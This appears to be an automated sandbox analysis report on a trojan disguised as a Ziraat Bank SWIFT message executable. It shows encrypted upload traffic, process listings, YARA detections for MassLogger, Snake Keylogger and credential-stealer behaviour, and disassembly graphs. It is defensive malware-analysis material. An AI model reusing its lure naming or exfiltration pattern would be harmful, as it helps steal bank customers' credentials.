                                                                        Data Ascii: &We@rMX">e!;celq|CW)x)6aAIHXG_qD'2OKn7~',G(f_i{SgRo+T;caUTXF]qY-\P(+;]QDAdol$^yT.C&I
                                                                        2024-12-12 20:40:10 UTC16355OUTData Raw: a2 85 12 70 ba ca 6e 76 ac 07 41 37 dd 66 3f 67 a4 cf dd 4d e2 f3 a7 e1 bd 23 1c fd b5 f5 e8 70 7b 64 f8 e0 07 ef ef 36 0a 07 ae 3c 5a fe ac ef 2d 7f a6 e5 67 47 80 22 1b eb f7 03 cb ff 56 40 f3 ed 40 51 04 b6 28 eb 66 71 e0 dc 9e 4c 9a c1 94 e4 2b 64 12 11 da 3c f0 fb 80 2d b5 a2 31 b4 c7 82 c9 d9 b7 cc 64 91 dc 5b 06 8f 08 6f 97 4c fa ad 42 26 05 57 21 93 7e 91 ad 42 af a5 bc c7 2e b1 dd 23 c2 73 79 d7 0f e6 b2 17 c2 70 f2 ce ad a2 6f b7 98 bc fd e6 29 32 e9 17 59 7f 7b 59 d7 c4 32 11 38 93 3f f8 5e b7 f6 fb b3 59 5f 91 b5 b7 7c 77 9a 37 4f 0b c1 55 d9 f8 bd ef cf 65 fd 4d e5 77 50 d8 58 82 f5 37 de b4 85 b5 df 2d ef 5d da 2c b7 9f eb 45 e0 76 51 00 2e 0b f2 cf b6 25 3b 3a 6c 05 e0 76 99 27 f1 76 2a 09 01 01 b8 88 f5 5f fb d6 16 d6 7e f5 ef 2a 99 14 8c
                                                                        Data Ascii: pnvA7f?gM#p{d6<Z-gG"V@@Q(fqL+d<-1d[oLB&W!~B.#sypo)2Y{Y28?^Y_|w7OUeMwPX7-],EvQ.%;:lv'v*_~*
                                                                        2024-12-12 20:40:10 UTC16355OUTData Raw: 19 08 e7 1c 3b 01 b8 17 12 30 93 7e 91 28 f0 22 13 05 5d 32 37 0b d7 8c 2c 21 00 b9 bd 77 1e 99 f4 8b 64 d2 2f 92 49 b9 63 49 2a ff 00 91 d7 88 bd 55 79 28 04 e0 56 09 98 0b bb dd c2 6f 01 66 32 0f 1e e9 02 10 32 f1 27 fb 02 70 9a 4c f6 65 1c 2b 01 98 a1 fc 5b 46 00 4a 2b fe a4 95 7b 2d 59 ce 6e 0b c0 58 f1 17 05 60 5c db ca 3f 51 ee cd 12 80 31 16 05 a0 22 af 15 80 ad 04 64 ac dc ab fd 61 9d 02 90 aa bf 65 05 20 2d 47 7f 0f 51 6d 18 8e 01 cf 43 d1 27 b1 62 10 94 7f 0a 40 51 00 72 fc 97 16 e9 47 3c 5e 00 52 fb 67 6d 1e fb 05 a5 9f 55 7e f4 39 f6 8b f0 33 c7 31 df 0b 6c e5 1f 97 82 c0 a1 b3 7a 14 7f 51 00 52 01 e8 37 01 91 78 10 bf 01 a8 c8 ab 15 7c cd 78 14 7b 83 1c 8c 95 81 51 00 9a ef 65 1f b3 04 20 15 80 0a 3d 05 60 15 7b c3 85 20 56 fe 21 ff 8c 79 1c
                                                                        Data Ascii: ;0~("]27,!wd/IcI*Uy(Vof22'pLe+[FJ+{-YnX`\?Q1"dae -GQmC'b@QrG<^RgmU~931lzQR7x|x{Qe =`{ V!y
                                                                        2024-12-12 20:40:10 UTC16355OUTData Raw: 0f 21 e8 91 04 54 a5 a0 aa 05 8b 00 9c da c2 4d c1 3d 90 7d 48 bf ba 2a 70 f6 72 e2 cd cd c2 d3 5b 6d 9d 17 82 1c 13 d6 11 e1 22 05 bb 17 ff 5d 9a be d8 e6 24 01 cf ef 49 bf ee f9 36 5f 08 a5 dd 24 09 a4 9f 27 94 7e 9e 40 ba f5 13 49 bd 71 88 f6 1c 9d 48 ea 8d 83 17 7d 83 58 15 80 f6 b9 cb 24 00 97 4a 24 ff 20 92 7d 11 cf 25 01 18 0a bc a5 12 c8 bc 71 88 44 9f a7 96 7e 35 12 80 a3 8a c0 71 05 20 b7 00 d7 37 01 7b 34 e7 65 9f f0 f1 50 fe 19 e3 be f7 6f 98 00 8c 24 a0 8e fb d2 f7 39 b5 00 54 25 60 2d 00 23 b1 17 c5 22 72 4e 91 7b 3a 02 ec 05 9f 17 81 0b 09 c0 41 82 4f 63 c5 16 42 e2 af a5 12 7f 42 95 80 aa 0c 44 06 d2 22 04 bb c7 dd 91 85 9d 97 7a 12 80 12 7a f4 41 37 06 4b f2 49 fc 51 e9 07 7e 4e 31 e6 b5 9f 62 48 3f aa 01 e7 55 04 16 91 27 e1 c7 7b 01 55
                                                                        Data Ascii: !TM=}H*pr[m"]$I6_$'~@IqH}X$J$ }%qD~5q 7{4ePo$9T%`-#"rN{:AOcBBD"zzA7KIQ~N1bH?U'{U
                                                                        2024-12-12 20:40:10 UTC16355OUTData Raw: be ba b8 b9 44 a4 5b 6e 0c 6e 2b 00 87 08 40 dd 16 bc 54 09 f8 7c 14 80 d3 67 d9 f7 53 a8 e7 56 05 60 3f d1 7b 05 47 45 02 70 e6 fd 0f f5 89 bc c5 52 0b c0 90 11 05 a0 f2 23 69 37 49 bc f8 8b 64 5f 14 f3 2c 55 00 6a 0d 92 af 3d ee 5b c6 b3 36 b7 ab 0b c0 d9 80 99 b7 df db 82 e4 1b 86 84 dd 62 90 f0 93 e0 ab e7 10 7c 9a d3 b8 06 c9 a7 5b 80 bd f8 13 4b 15 80 b5 f0 93 10 54 5f 52 6f 10 e3 08 c0 48 02 22 eb 24 00 55 f5 e7 ab 01 bd 00 f4 79 92 7e 82 18 48 fc b1 2e cb c5 2a af 16 80 d0 1e 23 96 dc ab 84 5f 2d ff f2 6d c0 45 fc 65 d9 47 c5 df 31 77 f4 e4 9f c1 b1 5e 04 1c ef ff cb e3 72 63 30 63 ad cb 6b 9c ec 93 b4 f3 30 af 63 c0 cc 33 96 f8 ab e3 9a 93 00 64 ac 8a 3e 5a 64 20 02 b0 ad ee b3 b8 8e ff 22 04 f5 8e 40 e6 c9 cf 14 f9 37 88 75 b6 27 ad 64 9e 97 7d
                                                                        Data Ascii: D[nn+@T|gSV`?{GEpR#i7Id_,Uj=[6b|[KT_RoH"$Uy~H.*#_-mEeG1w^rc0ck0c3d>Zd "@7u'd}
                                                                        2024-12-12 20:40:10 UTC16355OUTData Raw: d7 cb 3f e2 ad 10 ac 85 9f 13 82 99 22 00 6b 54 e5 87 d4 53 95 1f 78 01 48 d5 9f 8e 09 93 c3 3a bd 03 50 95 7f ad f8 33 74 1c 38 c7 8b dc 93 e8 93 f8 f3 68 ce 8b 3e f0 63 2f 02 25 00 95 d3 3d a6 79 f7 9f 2a ff 74 fc d7 e3 8f fb 4a 04 22 fa 5a c1 57 84 1f 31 e5 fa f9 d9 63 ee 68 2e 12 39 fa f6 34 7d 54 53 11 28 01 48 1f f9 87 18 94 24 d4 25 21 12 82 92 7f 12 72 b5 04 64 4e 02 4f 71 a4 9f 04 20 d0 47 ec 91 43 3e d5 80 ac 25 c6 bb 02 99 f7 7b d2 4a 08 4a d8 09 c6 c8 3b 09 41 2f 00 89 49 fe e9 1d 80 f4 6b 01 48 9e e2 08 3c 09 3b 89 3f 5a f0 97 86 30 4f ae cf a9 e5 a0 df 4b 73 54 f9 a9 d2 4f 52 cf 0b 41 5f ed 57 4b 40 40 e0 49 da 49 e0 21 ec 10 78 92 7f 12 7a b9 92 0f 79 67 71 bf 8e 7c aa fe 34 cf 9c 68 df 21 68 eb a1 96 79 12 80 c4 18 23 07 6b 01 a8 b1 d6 28
                                                                        Data Ascii: ?"kTSxH:P3t8h>c/%=y*tJ"ZW1ch.94}TS(H$%!rdNOq GC>%{JJ;A/IkH<;?Z0OKsTORA_WK@@II!xzygq|4h!hy#k(
                                                                        2024-12-12 20:40:11 UTC389INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Thu, 12 Dec 2024 20:40:11 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 1817
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:15:38:30
                                                                        Start date:12/12/2024
                                                                        Path:C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"
                                                                        Imagebase:0x330000
                                                                        File size:668'160 bytes
                                                                        MD5 hash:00F8C8C1F90E631EBFBFCEE425EF7BF7
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.2096033860.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2096033860.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2096033860.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2096033860.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.2096033860.0000000003F44000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2096033860.0000000003F44000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2096033860.0000000003F44000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2096033860.0000000003F44000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:15:38:34
                                                                        Start date:12/12/2024
                                                                        Path:C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"
                                                                        Imagebase:0x1d0000
                                                                        File size:668'160 bytes
                                                                        MD5 hash:00F8C8C1F90E631EBFBFCEE425EF7BF7
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:4
                                                                        Start time:15:38:34
                                                                        Start date:12/12/2024
                                                                        Path:C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"
                                                                        Imagebase:0x130000
                                                                        File size:668'160 bytes
                                                                        MD5 hash:00F8C8C1F90E631EBFBFCEE425EF7BF7
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:15:38:34
                                                                        Start date:12/12/2024
                                                                        Path:C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"
                                                                        Imagebase:0x840000
                                                                        File size:668'160 bytes
                                                                        MD5 hash:00F8C8C1F90E631EBFBFCEE425EF7BF7
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.4528266173.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.4528266173.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:11.3%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:58
                                                                          Total number of Limit Nodes:6
                                                                          execution_graph 31694 69459b4 31696 6947cc0 VirtualProtect 31694->31696 31697 6947cb8 VirtualProtect 31694->31697 31695 69459e5 31696->31695 31697->31695 31634 6946095 31638 6947cc0 31634->31638 31641 6947cb8 31634->31641 31635 69460a6 31639 6947d08 VirtualProtect 31638->31639 31640 6947d42 31639->31640 31640->31635 31642 6947cc0 VirtualProtect 31641->31642 31644 6947d42 31642->31644 31644->31635 31653 24cd4d8 31654 24cd51e 31653->31654 31658 24cd6a8 31654->31658 31661 24cd6b8 31654->31661 31655 24cd60b 31664 24cb830 31658->31664 31662 24cd6e6 31661->31662 31663 24cb830 DuplicateHandle 31661->31663 31662->31655 31663->31662 31665 24cd720 DuplicateHandle 31664->31665 31666 24cd6e6 31665->31666 31666->31655 31702 24c4668 31703 24c467a 31702->31703 31704 24c4686 31703->31704 31706 24c4779 31703->31706 31707 24c479d 31706->31707 31711 24c4878 31707->31711 31715 24c4888 31707->31715 31713 24c48af 31711->31713 31712 24c498c 31712->31712 31713->31712 31719 24c44b0 31713->31719 31717 24c48af 31715->31717 31716 24c498c 31716->31716 31717->31716 31718 24c44b0 CreateActCtxA 31717->31718 31718->31716 31720 24c5918 CreateActCtxA 31719->31720 31722 24c59db 31720->31722 31667 69466c1 31668 69466c4 31667->31668 31669 6946729 31668->31669 31670 6947cc0 VirtualProtect 31668->31670 31671 6947cb8 VirtualProtect 31668->31671 31670->31668 31671->31668 31672 4c54050 31673 4c54092 31672->31673 31675 4c54099 31672->31675 31674 4c540ea CallWindowProcW 31673->31674 31673->31675 31674->31675 31676 24cad50 31677 24cad5f 31676->31677 31680 24cae48 31676->31680 31685 24cae37 31676->31685 31681 24cae59 31680->31681 31682 24cae7c 31680->31682 31681->31682 31683 24cb080 GetModuleHandleW 31681->31683 31682->31677 31684 24cb0ad 31683->31684 31684->31677 31686 24cae7c 31685->31686 31687 24cae59 31685->31687 31686->31677 31687->31686 31688 24cb080 GetModuleHandleW 31687->31688 31689 24cb0ad 31688->31689 31689->31677

                                                                          Executed Functions

                                                                          Function 06942C9E Relevance: 4.1, Strings: 3, Instructions: 315COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 295 6942c9e-6942ca0 296 6942cc4-6942ccc 295->296 297 6942ca2-6942cab 295->297 298 6942cce-6942ceb 296->298 299 6942cef-6942cf1 296->299 297->296 298->299 300 6942cf2-6942d16 299->300 301 6942d19-6942d1d 299->301 300->301 303 6942d24-6942d62 call 69432a0 301->303 304 6942d1f-6942d23 301->304 307 6942d68 303->307 304->303 308 6942d6f-6942d8b 307->308 309 6942d94-6942d95 308->309 310 6942d8d 308->310 311 6942d9a-6942d9e 309->311 312 69430eb-69430f2 309->312 310->307 310->311 310->312 313 6942e10-6942e28 310->313 314 6942f73-6942f88 310->314 315 6942fbd-6942fc1 310->315 316 6942e7d-6942e9b 310->316 317 6942ddb-6942de4 310->317 318 694307b-69430a0 310->318 319 69430a5-69430b1 310->319 320 6942f06-6942f26 310->320 321 6942e66-6942e78 310->321 322 6942f47-6942f5c 310->322 323 6942dc7-6942dd9 310->323 324 6942ea0-6942eac 310->324 325 6942f61-6942f6e 310->325 326 6942f8d-6942f91 310->326 327 6942fed-6942ff9 310->327 328 6942eef-6942f01 310->328 329 69430cf-69430e6 310->329 330 6942eca-6942eea 310->330 331 6942f2b-6942f42 310->331 334 6942da0-6942daf 311->334 335 6942db1-6942db8 311->335 340 6942e2f-6942e45 313->340 341 6942e2a 313->341 314->308 344 6942fd4-6942fdb 315->344 345 6942fc3-6942fd2 315->345 316->308 336 6942de6-6942df5 317->336 337 6942df7-6942dfe 317->337 318->308 338 69430b3 319->338 339 69430b8-69430ca 319->339 320->308 321->308 322->308 323->308 332 6942eb3-6942ec5 324->332 333 6942eae 324->333 325->308 342 6942fa4-6942fab 326->342 343 6942f93-6942fa2 326->343 346 6943000-6943016 327->346 347 6942ffb 327->347 328->308 329->308 330->308 331->308 332->308 333->332 348 6942dbf-6942dc5 334->348 335->348 350 6942e05-6942e0b 336->350 337->350 338->339 339->308 362 6942e47 340->362 363 6942e4c-6942e61 340->363 341->340 351 6942fb2-6942fb8 342->351 343->351 352 6942fe2-6942fe8 344->352 345->352 360 694301d-6943033 346->360 361 6943018 346->361 347->346 348->308 350->308 351->308 352->308 366 6943035 360->366 367 694303a-6943050 360->367 361->360 362->363 363->308 366->367 369 6943057-6943076 367->369 370 6943052 367->370 369->308 370->369
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ry$ry$ry
                                                                          • API String ID: 0-128149707
                                                                          • Opcode ID: 44d841fccb1a2bc22032ca48b750aaebcf1025f353807b5a0f63b4937e198850
                                                                          • Instruction ID: f62cf8d52c8fba2dce62d94c7b58d3e55c6657d46a3a2c39783173b5fdaf8b32
                                                                          • Opcode Fuzzy Hash: 44d841fccb1a2bc22032ca48b750aaebcf1025f353807b5a0f63b4937e198850
                                                                          • Instruction Fuzzy Hash: 97D17F70E0560ADFDB58DFA5C8818AEFBB2FF89340F14C566E405AB255D734AA42CF90
                                                                          Function 06942CAD Relevance: 4.1, Strings: 3, Instructions: 309COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 373 6942cad-6942ccc 375 6942cce-6942ceb 373->375 376 6942cef-6942cf1 373->376 375->376 377 6942cf2-6942d16 376->377 378 6942d19-6942d1d 376->378 377->378 380 6942d24-6942d62 call 69432a0 378->380 381 6942d1f-6942d23 378->381 384 6942d68 380->384 381->380 385 6942d6f-6942d8b 384->385 386 6942d94-6942d95 385->386 387 6942d8d 385->387 388 6942d9a-6942d9e 386->388 389 69430eb-69430f2 386->389 387->384 387->388 387->389 390 6942e10-6942e28 387->390 391 6942f73-6942f88 387->391 392 6942fbd-6942fc1 387->392 393 6942e7d-6942e9b 387->393 394 6942ddb-6942de4 387->394 395 694307b-69430a0 387->395 396 69430a5-69430b1 387->396 397 6942f06-6942f26 387->397 398 6942e66-6942e78 387->398 399 6942f47-6942f5c 387->399 400 6942dc7-6942dd9 387->400 401 6942ea0-6942eac 387->401 402 6942f61-6942f6e 387->402 403 6942f8d-6942f91 387->403 404 6942fed-6942ff9 387->404 405 6942eef-6942f01 387->405 406 69430cf-69430e6 387->406 407 6942eca-6942eea 387->407 408 6942f2b-6942f42 387->408 411 6942da0-6942daf 388->411 412 6942db1-6942db8 388->412 417 6942e2f-6942e45 390->417 418 6942e2a 390->418 391->385 421 6942fd4-6942fdb 392->421 422 6942fc3-6942fd2 392->422 393->385 413 6942de6-6942df5 394->413 414 6942df7-6942dfe 394->414 395->385 415 69430b3 396->415 416 69430b8-69430ca 396->416 397->385 398->385 399->385 400->385 409 6942eb3-6942ec5 401->409 410 6942eae 401->410 402->385 419 6942fa4-6942fab 403->419 420 6942f93-6942fa2 403->420 423 6943000-6943016 404->423 424 6942ffb 404->424 405->385 406->385 407->385 408->385 409->385 410->409 425 6942dbf-6942dc5 411->425 412->425 427 6942e05-6942e0b 413->427 414->427 415->416 416->385 439 6942e47 417->439 440 6942e4c-6942e61 417->440 418->417 428 6942fb2-6942fb8 419->428 420->428 429 6942fe2-6942fe8 421->429 422->429 437 694301d-6943033 423->437 438 6943018 423->438 424->423 425->385 427->385 428->385 429->385 443 6943035 437->443 444 694303a-6943050 437->444 438->437 439->440 440->385 443->444 446 6943057-6943076 444->446 447 6943052 444->447 446->385 447->446
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ry$ry$ry
                                                                          • API String ID: 0-128149707
                                                                          • Opcode ID: 2276ebf30c9d2c3f1c4fe9bf0de9cb559d747b89e6d6037c10b6bc6c1b0e4179
                                                                          • Instruction ID: be47af1f9d018e63f471d94e4702f1e41e5493ba49e06f4cb4561752bb1834a8
                                                                          • Opcode Fuzzy Hash: 2276ebf30c9d2c3f1c4fe9bf0de9cb559d747b89e6d6037c10b6bc6c1b0e4179
                                                                          • Instruction Fuzzy Hash: A1D17F70E0520ADFDB58DFA5C4818AEFBB2FF89340F10C566E415AB255D734AA42CF94
                                                                          Function 06942CF8 Relevance: 4.0, Strings: 3, Instructions: 284COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 450 6942cf8-6942d1d 452 6942d24-6942d62 call 69432a0 450->452 453 6942d1f-6942d23 450->453 456 6942d68 452->456 453->452 457 6942d6f-6942d8b 456->457 458 6942d94-6942d95 457->458 459 6942d8d 457->459 460 6942d9a-6942d9e 458->460 461 69430eb-69430f2 458->461 459->456 459->460 459->461 462 6942e10-6942e28 459->462 463 6942f73-6942f88 459->463 464 6942fbd-6942fc1 459->464 465 6942e7d-6942e9b 459->465 466 6942ddb-6942de4 459->466 467 694307b-69430a0 459->467 468 69430a5-69430b1 459->468 469 6942f06-6942f26 459->469 470 6942e66-6942e78 459->470 471 6942f47-6942f5c 459->471 472 6942dc7-6942dd9 459->472 473 6942ea0-6942eac 459->473 474 6942f61-6942f6e 459->474 475 6942f8d-6942f91 459->475 476 6942fed-6942ff9 459->476 477 6942eef-6942f01 459->477 478 69430cf-69430e6 459->478 479 6942eca-6942eea 459->479 480 6942f2b-6942f42 459->480 483 6942da0-6942daf 460->483 484 6942db1-6942db8 460->484 489 6942e2f-6942e45 462->489 490 6942e2a 462->490 463->457 493 6942fd4-6942fdb 464->493 494 6942fc3-6942fd2 464->494 465->457 485 6942de6-6942df5 466->485 486 6942df7-6942dfe 466->486 467->457 487 69430b3 468->487 488 69430b8-69430ca 468->488 469->457 470->457 471->457 472->457 481 6942eb3-6942ec5 473->481 482 6942eae 473->482 474->457 491 6942fa4-6942fab 475->491 492 6942f93-6942fa2 475->492 495 6943000-6943016 476->495 496 6942ffb 476->496 477->457 478->457 479->457 480->457 481->457 482->481 497 6942dbf-6942dc5 483->497 484->497 499 6942e05-6942e0b 485->499 486->499 487->488 488->457 511 6942e47 489->511 512 6942e4c-6942e61 489->512 490->489 500 6942fb2-6942fb8 491->500 492->500 501 6942fe2-6942fe8 493->501 494->501 509 694301d-6943033 495->509 510 6943018 495->510 496->495 497->457 499->457 500->457 501->457 515 6943035 509->515 516 694303a-6943050 509->516 510->509 511->512 512->457 515->516 518 6943057-6943076 516->518 519 6943052 516->519 518->457 519->518
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ry$ry$ry
                                                                          • API String ID: 0-128149707
                                                                          • Opcode ID: b1526f3802e8700c6714788ba82e0f60b03256aa59754534a251b8a8e7054e46
                                                                          • Instruction ID: 551b56843dbd4b427b5bedff2162ce522cda8d5a967ac7fd1704cd273bd97e28
                                                                          • Opcode Fuzzy Hash: b1526f3802e8700c6714788ba82e0f60b03256aa59754534a251b8a8e7054e46
                                                                          • Instruction Fuzzy Hash: A6C16F70E0520ADFDB58DFA5C4858AEFBB2FF89300F10D566E416AB614D734AA42CF94
                                                                          Function 06940B3D Relevance: 4.0, Strings: 3, Instructions: 243COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 522 6940b3d-6940bb3 525 6940bb5 522->525 526 6940bba-6940c14 522->526 525->526 529 6940c17 526->529 530 6940c1e-6940c3a 529->530 531 6940c43-6940c44 530->531 532 6940c3c 530->532 533 6940df0-6940e60 531->533 532->529 532->531 532->533 534 6940d93-6940dae 532->534 535 6940c73-6940c85 532->535 536 6940db3-6940dca 532->536 537 6940cdc-6940d06 532->537 538 6940d46-6940d5b 532->538 539 6940c87-6940ca7 532->539 540 6940d60-6940d6d 532->540 541 6940cac-6940cb0 532->541 542 6940dcf-6940deb 532->542 543 6940c49-6940c71 532->543 544 6940d0b-6940d41 532->544 560 6940e62 call 6942766 533->560 561 6940e62 call 6942b37 533->561 562 6940e62 call 6942ae8 533->562 563 6940e62 call 6941e7a 533->563 564 6940e62 call 694214b 533->564 534->530 535->530 536->530 537->530 538->530 539->530 555 6940d76-6940d8e 540->555 545 6940cb2-6940cc1 541->545 546 6940cc3-6940cca 541->546 542->530 543->530 544->530 550 6940cd1-6940cd7 545->550 546->550 550->530 555->530 559 6940e68-6940e72 560->559 561->559 562->559 563->559 564->559
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q$Te]q$z^I
                                                                          • API String ID: 0-3923789156
                                                                          • Opcode ID: eb929e29d6bc4aaadccc0ef30001cbf9fbc71885e8fda90af55e3f8c677688fe
                                                                          • Instruction ID: 76adfd3e2434df72bbbc6147bcc8af66e58bf3fc455d2830b77e04753badfb5b
                                                                          • Opcode Fuzzy Hash: eb929e29d6bc4aaadccc0ef30001cbf9fbc71885e8fda90af55e3f8c677688fe
                                                                          • Instruction Fuzzy Hash: 4AA11675E04209CFDB48CFAAC984ADEFBF2EF89310F14942AD515AB254D7349942CFA4
                                                                          Function 06940B76 Relevance: 4.0, Strings: 3, Instructions: 228COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 565 6940b76-6940bb3 567 6940bb5 565->567 568 6940bba-6940c14 565->568 567->568 571 6940c17 568->571 572 6940c1e-6940c3a 571->572 573 6940c43-6940c44 572->573 574 6940c3c 572->574 575 6940df0-6940e60 573->575 574->571 574->573 574->575 576 6940d93-6940dae 574->576 577 6940c73-6940c85 574->577 578 6940db3-6940dca 574->578 579 6940cdc-6940d06 574->579 580 6940d46-6940d5b 574->580 581 6940c87-6940ca7 574->581 582 6940d60-6940d6d 574->582 583 6940cac-6940cb0 574->583 584 6940dcf-6940deb 574->584 585 6940c49-6940c71 574->585 586 6940d0b-6940d41 574->586 602 6940e62 call 6942766 575->602 603 6940e62 call 6942b37 575->603 604 6940e62 call 6942ae8 575->604 605 6940e62 call 6941e7a 575->605 606 6940e62 call 694214b 575->606 576->572 577->572 578->572 579->572 580->572 581->572 597 6940d76-6940d8e 582->597 587 6940cb2-6940cc1 583->587 588 6940cc3-6940cca 583->588 584->572 585->572 586->572 592 6940cd1-6940cd7 587->592 588->592 592->572 597->572 601 6940e68-6940e72 602->601 603->601 604->601 605->601 606->601
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q$Te]q$z^I
                                                                          • API String ID: 0-3923789156
